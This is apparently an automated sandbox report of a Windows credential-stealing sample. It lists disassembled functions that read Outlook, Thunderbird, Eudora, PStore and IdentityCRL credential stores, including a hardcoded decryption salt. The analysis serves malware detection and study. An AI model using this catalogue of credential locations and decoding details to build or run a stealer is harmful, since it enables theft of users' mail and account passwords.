                                                            • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ??2@$memset
                                                            • String ID:
                                                            • API String ID: 1860491036-0
                                                            • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                            • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                            • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                            • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                            APIs
                                                            • wcslen.MSVCRT ref: 0040A8E2
                                                              • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                              • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                              • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                            • free.MSVCRT ref: 0040A908
                                                            • free.MSVCRT ref: 0040A92B
                                                            • memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: free$memcpy$mallocwcslen
                                                            • String ID:
                                                            • API String ID: 726966127-0
                                                            • Opcode ID: 48b5110f71ff603a034409774c278151667955e8266c70f87da55b4d75e749d9
                                                            • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                            • Opcode Fuzzy Hash: 48b5110f71ff603a034409774c278151667955e8266c70f87da55b4d75e749d9
                                                            • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                            APIs
                                                            • wcslen.MSVCRT ref: 0040B1DE
                                                            • free.MSVCRT ref: 0040B201
                                                              • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                              • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                              • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                            • free.MSVCRT ref: 0040B224
                                                            • memcpy.MSVCRT(00000000,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: free$memcpy$mallocwcslen
                                                            • String ID:
                                                            • API String ID: 726966127-0
                                                            • Opcode ID: dbfa2e27eb608a9f9479d75297a1486c58e4153ca5a873f0eddd30e24b8e668e
                                                            • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                            • Opcode Fuzzy Hash: dbfa2e27eb608a9f9479d75297a1486c58e4153ca5a873f0eddd30e24b8e668e
                                                            • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                            APIs
                                                            • memcmp.MSVCRT(?,004599B8,00000010,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408AF3
                                                              • Part of subcall function 00408A6E: memcmp.MSVCRT(00409690,00408B12,00000004,000000FF), ref: 00408A8C
                                                              • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
                                                              • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
                                                            • memcmp.MSVCRT(?,00000000,0000000E,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B2B
                                                            • memcmp.MSVCRT(?,00000000,0000000B,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B5C
                                                            • memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcmp$memcpy
                                                            • String ID:
                                                            • API String ID: 231171946-0
                                                            • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                            • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                            • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                            • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                            APIs
                                                            • strlen.MSVCRT ref: 0040B0D8
                                                            • free.MSVCRT ref: 0040B0FB
                                                              • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                              • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                              • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                            • free.MSVCRT ref: 0040B12C
                                                            • memcpy.MSVCRT(00000000,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: free$memcpy$mallocstrlen
                                                            • String ID:
                                                            • API String ID: 3669619086-0
                                                            • Opcode ID: 04e6466bee9c2f86a7d5fc6531cc0ab8b23c91005f7f75429686add4e9716e46
                                                            • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                            • Opcode Fuzzy Hash: 04e6466bee9c2f86a7d5fc6531cc0ab8b23c91005f7f75429686add4e9716e46
                                                            • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                            • malloc.MSVCRT ref: 00417407
                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                            • free.MSVCRT ref: 00417425
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$freemalloc
                                                            • String ID:
                                                            • API String ID: 2605342592-0
                                                            • Opcode ID: 2d709113fcafe1a04d94ccb325df1834664bd2c227d6907f8f745ae81c56706a
                                                            • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                            • Opcode Fuzzy Hash: 2d709113fcafe1a04d94ccb325df1834664bd2c227d6907f8f745ae81c56706a
                                                            • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: wcslen$wcscat$wcscpy
                                                            • String ID:
                                                            • API String ID: 1961120804-0
                                                            • Opcode ID: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
                                                            • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                            • Opcode Fuzzy Hash: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
                                                            • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                                                            Execution Graph

                                                            Execution Coverage:2.5%
                                                            Dynamic/Decrypted Code Coverage:19.7%
                                                            Signature Coverage:0.5%
                                                            Total number of Nodes:876
                                                            Total number of Limit Nodes:22
_mbscat 34062->34073 34065 407e94 34064->34065 34066 407e6c strcmp 34064->34066 34065->34042 34066->34065 34067 407e83 strcmp 34066->34067 34067->34065 34069 407fa3 34068->34069 34070 407f99 FindClose 34068->34070 34069->34043 34070->34069 34071->34032 34072->34052 34073->34061 34074->33491 34075->33495 34076->33502 34077->33501 34078->33508 34079->33505 34080->33500 34425 43ffc8 18 API calls 34239 4281cc 15 API calls 34427 4383cc 110 API calls 34240 4275d3 41 API calls 34428 4153d3 22 API calls 34241 444dd7 _XcptFilter 34433 4013de 15 API calls 34435 425115 111 API calls 34436 43f7db 18 API calls 34439 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34243 4335ee 16 API calls 34441 429fef 11 API calls 34244 444deb _exit _c_exit 34442 40bbf0 138 API calls 34247 425115 79 API calls 34446 437ffa 22 API calls 34251 4021ff 14 API calls 34252 43f5fc 149 API calls 34447 40e381 9 API calls 34254 405983 40 API calls 34255 42b186 27 API calls 34256 427d86 76 API calls 34257 403585 20 API calls 34259 42e58e 18 API calls 34262 425115 75 API calls 34264 401592 8 API calls 33158 410b92 33161 410a6b 33158->33161 33160 410bb2 33162 410a77 33161->33162 33163 410a89 GetPrivateProfileIntA 33161->33163 33166 410983 memset _itoa WritePrivateProfileStringA 33162->33166 33163->33160 33165 410a84 33165->33160 33166->33165 34451 434395 16 API calls 34266 441d9c memcmp 34453 43f79b 119 API calls 34267 40c599 43 API calls 34454 426741 87 API calls 34271 4401a6 21 API calls 34273 426da6 memcpy memset memset memcpy 34274 4335a5 15 API calls 34276 4299ab memset memset memcpy memset memset 34277 40b1ab 8 API calls 34459 425115 76 API calls 34463 4113b2 18 API calls 34467 40a3b8 memset sprintf SendMessageA 34081 410bbc 34084 4109cf 34081->34084 34085 4109dc 34084->34085 34086 410a23 memset GetPrivateProfileStringA 34085->34086 34087 4109ea memset 34085->34087 34092 407646 strlen 34086->34092 34097 4075cd sprintf memcpy 34087->34097 34090 410a65 34091 410a0c WritePrivateProfileStringA 
34091->34090 34093 40765a 34092->34093 34094 40765c 34092->34094 34093->34090 34096 4076a3 34094->34096 34098 40737c strtoul 34094->34098 34096->34090 34097->34091 34098->34094 34279 40b5bf memset memset _mbsicmp

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 129 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 408450-408453 129->130 131 40841c 129->131 133 408484-408488 130->133 134 408455-40845e 130->134 132 408422-40842b 131->132 135 408432-40844e 132->135 136 40842d-408431 132->136 137 408460-408464 134->137 138 408465-408482 134->138 135->130 135->132 136->135 137->138 138->133 138->134
                                                            APIs
                                                            • memset.MSVCRT ref: 0040832F
                                                            • memset.MSVCRT ref: 00408343
                                                            • memset.MSVCRT ref: 0040835F
                                                            • memset.MSVCRT ref: 00408376
                                                            • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                            • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                            • strlen.MSVCRT ref: 004083E9
                                                            • strlen.MSVCRT ref: 004083F8
                                                            • memcpy.MSVCRT(?,000000A3,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040840A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                            • String ID: 5$H$O$b$i$}$}
                                                            • API String ID: 1832431107-3760989150
                                                            • Opcode ID: a5ed1eb31af54c8a3c73713876d0dfdb02d87ab57461c694f2cbdc33214a2147
                                                            • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                                            • Opcode Fuzzy Hash: a5ed1eb31af54c8a3c73713876d0dfdb02d87ab57461c694f2cbdc33214a2147
                                                            • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65
                                                            APIs
                                                            • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                                            • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                                            • strlen.MSVCRT ref: 00407F5C
                                                            • strlen.MSVCRT ref: 00407F64
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: FileFindstrlen$FirstNext
                                                            • String ID: ACD
                                                            • API String ID: 379999529-620537770
                                                            • Opcode ID: ac238b99766b2c560e4788d49261b3e8246b44fda50c364b2703e5efa62775d4
                                                            • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                                            • Opcode Fuzzy Hash: ac238b99766b2c560e4788d49261b3e8246b44fda50c364b2703e5efa62775d4
                                                            • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A

                                                            Control-flow Graph

                                                            APIs
                                                            • memset.MSVCRT ref: 00401E8B
                                                            • strlen.MSVCRT ref: 00401EA4
                                                            • strlen.MSVCRT ref: 00401EB2
                                                            • strlen.MSVCRT ref: 00401EF8
                                                            • strlen.MSVCRT ref: 00401F06
                                                            • memset.MSVCRT ref: 00401FB1
                                                            • atoi.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00401FE0
                                                            • memset.MSVCRT ref: 00402003
                                                            • sprintf.MSVCRT ref: 00402030
                                                              • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                            • memset.MSVCRT ref: 00402086
                                                            • memset.MSVCRT ref: 0040209B
                                                            • strlen.MSVCRT ref: 004020A1
                                                            • strlen.MSVCRT ref: 004020AF
                                                            • strlen.MSVCRT ref: 004020E2
                                                            • strlen.MSVCRT ref: 004020F0
                                                            • memset.MSVCRT ref: 00402018
                                                              • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                              • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                            • _mbscpy.MSVCRT(?,00000000), ref: 00402177
                                                            • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00402181
                                                            • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040219C
                                                              • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                                            • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                            • API String ID: 1846531875-4223776976
                                                            • Opcode ID: 1d5c9e5188f6b082a2305a72209a31590191ad01f9a44e6bfeac10cb5ccfbbc2
                                                            • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                                            • Opcode Fuzzy Hash: 1d5c9e5188f6b082a2305a72209a31590191ad01f9a44e6bfeac10cb5ccfbbc2
                                                            • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll,75D50A60,?,00000000,?,?,?,0040CF60,75D50A60), ref: 00404AB8
                                                              • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                              • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040CF60,75D50A60), ref: 00404ADE
                                                              • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                            • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D190
                                                            • DeleteObject.GDI32(?), ref: 0040D1A6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                            • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                            • API String ID: 745651260-375988210
                                                            • Opcode ID: 66dab05e126b40913f404dced1d7a1b7c9917f067a9e41187f19818bfede1135
                                                            • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                                                            • Opcode Fuzzy Hash: 66dab05e126b40913f404dced1d7a1b7c9917f067a9e41187f19818bfede1135
                                                            • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00410825,?,?,?,?,?,?,004041C4), ref: 004107FD
                                                            • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                                            • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                                            • _mbscpy.MSVCRT(?,?), ref: 00403E54
                                                            Strings
                                                            • pstorec.dll, xrefs: 00403C30
                                                            • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                                            • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                                            • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                                            • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                                            • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                                            • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                                            • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                            • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                            • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                                            • PStoreCreateInstance, xrefs: 00403C44
                                                            • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Library$AddressFreeLoadProc_mbscpy
                                                            • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                            • API String ID: 1197458902-317895162
                                                            • Opcode ID: ad300f429030269d79da7f29e18846d437bf74986d1cc708d4c29655c4209bd3
                                                            • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                                                            • Opcode Fuzzy Hash: ad300f429030269d79da7f29e18846d437bf74986d1cc708d4c29655c4209bd3
                                                            • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 231 44b49f-44b4b0 call 444e38 GetModuleHandleA 235 444c87-444d00 __set_app_type __p__fmode __p__commode call 444e34 231->235 236 444c68-444c73 231->236 242 444d02-444d0d __setusermatherr 235->242 243 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 235->243 236->235 237 444c75-444c85 236->237 237->235 242->243 246 444d6a-444d72 243->246 247 444d74-444d76 246->247 248 444d78-444d7b 246->248 247->246 247->248 249 444d81-444d85 248->249 250 444d7d-444d7e 248->250 251 444d87-444d89 249->251 252 444d8b-444dc6 GetStartupInfoA GetModuleHandleA call 40cf44 249->252 250->249 251->250 251->252 257 444dcf-444e0f _cexit call 444e71 252->257 258 444dc8-444dc9 exit 252->258 258->257
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                            • String ID: h4ND
                                                            • API String ID: 3662548030-3825183422
                                                            • Opcode ID: 2fd2f5ec857dcc0751115c7934250d8e7778a8a50373ba8a776a572aa6a6b888
                                                            • Instruction ID: 35bbd85eb0bb2ce5e1f1b9c4bc8677619723fc104b62ea38f54f9f601267cc63
                                                            • Opcode Fuzzy Hash: 2fd2f5ec857dcc0751115c7934250d8e7778a8a50373ba8a776a572aa6a6b888
                                                            • Instruction Fuzzy Hash: D941D3B5C023449FEB619FA4DC847AD7BB4FB49325B28412BE451A32A1D7788D41CB5C

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 262 40fb00-40fb35 call 44b090 RegOpenKeyExA 265 40fc37-40fc3d 262->265 266 40fb3b-40fb4f RegOpenKeyExA 262->266 267 40fb55-40fb7e RegQueryValueExA 266->267 268 40fc2d-40fc31 RegCloseKey 266->268 269 40fc23-40fc27 RegCloseKey 267->269 270 40fb84-40fb93 call 404734 267->270 268->265 269->268 270->269 273 40fb99-40fbd1 call 4047a5 270->273 273->269 276 40fbd3-40fbdb 273->276 277 40fc19-40fc1d LocalFree 276->277 278 40fbdd-40fc14 memcpy * 2 call 40f802 276->278 277->269 278->277
                                                            APIs
                                                            • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
                                                            • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB4B
                                                            • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
                                                              • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                              • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                            • memcpy.MSVCRT(?,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FBE4
                                                            • memcpy.MSVCRT(?,?,?), ref: 0040FBF9
                                                              • Part of subcall function 0040F802: RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                                              • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                                                              • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                              • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                            • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                                                            • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E7F,?), ref: 0040FC31
